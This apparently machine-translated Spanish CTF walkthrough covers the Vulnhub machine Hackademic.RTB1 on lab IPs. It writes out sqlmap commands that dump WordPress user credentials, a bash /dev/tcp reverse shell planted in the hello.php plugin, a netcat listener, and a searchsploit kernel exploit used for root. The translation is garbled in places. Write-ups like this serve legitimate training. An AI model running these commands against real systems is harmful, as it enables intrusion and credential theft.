Dron objetivo de la serie Vulnhub --- Hackadmeic.RTB1

Language 2023-08-22 19:25:04 views: null

Serie: Hackademic (un total de 2 unidades en esta serie)
Dificultad: Principiante

recoger mensaje

descubrimiento de host

netdiscover -r 192.168.80.0/24

imagen-20230819150242058

escaneo de puertos

nmap -A -p- 192.168.80.143

imagen-20230819151707785

Puerto de acceso 80

imagen-20230819151453856

Utilice el complemento de huellas digitales para ver síWordPress

imagen-20230819151946799

Según el contenido que se muestra en la página de inicio, haga clic entarget

imagen-20230819152040904

imagen-20230819152140328

Haga clic en el enlace en el que se puede hacer clic en la página y descubra que Uncategorizedcuando hace clic, el enlace se convierte en

http://192.168.80.143/Hackademic_RTB1/?cat=1

imagen-20230819152319809

Pruebe si hay inyección SQL, ?cat=1agréguela después 'y descubra que hay un mensaje de error en la declaración SQL, puede juzgar que existe una vulnerabilidad de inyección SQL

imagen-20230819152424365

escaneo de directorio

Simple explosión de la dirección IP, no se puede escanear información útil del directorio

dirsearch -u http://192.168.80.143 -i 200

imagen-20230819164419748

Al principio, escaneó la IP directamente, y ahora hay un directorio adicional /Hackademic_RTB1/, luego escaneó directamente el directorio

dirsearch -u http://192.168.80.143/Hackademic_RTB1/ -i 200

imagen-20230819164354082

explotar

mapa sql

Ver qué bases de datos están disponibles

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" --dbs --batch

imagen-20230819152623542

obtener todas las tablas

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch

imagen-20230819152737643

Obtener todos los campos de la tabla

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  --columns --batch

imagen-20230819152939501

obtener los datos deseados

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  -C user_login,user_pass --dump

imagen-20230819153048717

Fondo de inicio de sesión192.168.80.143/Hackademic_RTB1/wp-admin/

imagen-20230819164537854

Utilice una contraseña de usuario para iniciar sesión con NickJamesuna contraseña:admin

imagen-20230819165028767

No hay nada que usar después de iniciar sesión, intente iniciar sesión con otro usuario

Usuario: GeorgeMillercontraseña q1w2e3, encontré que hay una dirección editada Pluginsen la opción , agregue un shell inversoPlugin Editor

system("bash -c 'sh -i &>/dev/tcp/192.168.80.132/8989 0>&1'");

imagen-20230819184510299

Kali comienza a monitorear

nc -lvvp 8989

Después de enviar, debe conocer la ruta anterior y descubrir la ruta adesencadenarcaparazón de rebote

Encuentre el método uno de la ruta de envío:

Los archivos cargados por WordPress se almacenan en el directorio de forma predeterminada /wp-content/uploads, y la carpeta Cargas incluye todas las imágenes, videos y archivos adjuntos cargados.

Dentro de la carpeta de WordPress, encontrará una gran cantidad de archivos de código y 3 carpetas**wp-admin contenido-wp wp-incluye**

wp-admin Así es, este es su panel de control, la interfaz que ve después de iniciar sesión en WordPress, incluidos todos los archivos de fondo.

wp-contentContiene todo su contenido, incluidos complementos, temas y sus cargas.

La carpeta Complementos contiene todos los complementos. Cada complemento tiene su propia carpeta. Si Aksimet se encuentra dentro de la carpeta Akismet

Asimismo, la carpeta de temas contiene todos sus temas. Al igual que los complementos, hay carpetas separadas para cada tema.

Carpeta de cargas, todas las imágenes, videos y archivos adjuntos cargados.

Los idiomas se tratan de idiomas.

wp-includesIncluye todos los archivos y bibliotecas necesarios para el administrador de WordPress, el editor y las bibliotecas de JavaScript, CSS y campos de imágenes.

Cuando exploté el directorio, encontré un wp-contentdirectorio, puedes visitarlo para verlo.

imagen-20230819171036292

La página se muestra de la siguiente manera.

http://192.168.80.143/Hackademic_RTB1/wp-content/

imagen-20230819171102568

Justo ahora en el shell de rebote editado Pluginsen las opciones , justo ahora la página de edición también muestra que está editandoPlugin EditorPlugin Editorhello.php

imagen-20230819184413751

Entonces en http://192.168.80.143/Hackademic_RTB1/wp-content/la página haga clicplugins

imagen-20230819171841864

imagen-20230819171903184

Lo vi hello.php, haz clic para hello.phpactivar el proyectil de rebote (espera pacientemente -----------------)

imagen-20230819172020273

escalada de privilegios del kernel

Verifique la versión del kernel

uname -a

imagen-20230819180019128

Abra una nueva terminal para buscar vulnerabilidades de esta versión.

searchsploit 2.6.3 | grep "Local Privilege Escalation"

imagen-20230819180245056

ver ruta completa

searchsploit -p linux/local/15285.c

imagen-20230819180544957

Copie esto 15285.ca la apacheruta raíz del servicio./var/www/html

sudo cp  /usr/share/exploitdb/exploits/linux/local/15285.c  /var/www/html/15285.c

iniciar apacheservicio

systemctl restart apache2.service

imagen-20230819184303398

gcc 15285.c -o exp

# 将15285.c预处理、汇编、编译并链接形成可执行文件exp

#-o选项用来指定输出文件的文件名

Preprocesar 15285.c, ensamblar, compilar y vincular para formar un archivo ejecutable exp.

-oopción para especificar el nombre del archivo de salida

imagen-20230819185040509

inserte la descripción de la imagen aquí

¡Pasó el nivel con éxito! ! !

Supongo que te gusta

Origin blog.csdn.net/ZhaoSong_/article/details/132383050
Recomendado
Clasificación
Diario
Más
2024-05-09(31)
2024-05-08(18)
2024-05-07(35)
2024-05-06(4)
2024-05-05(0)
2024-05-04(17)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(33)

Code World

© 2018 codetd.com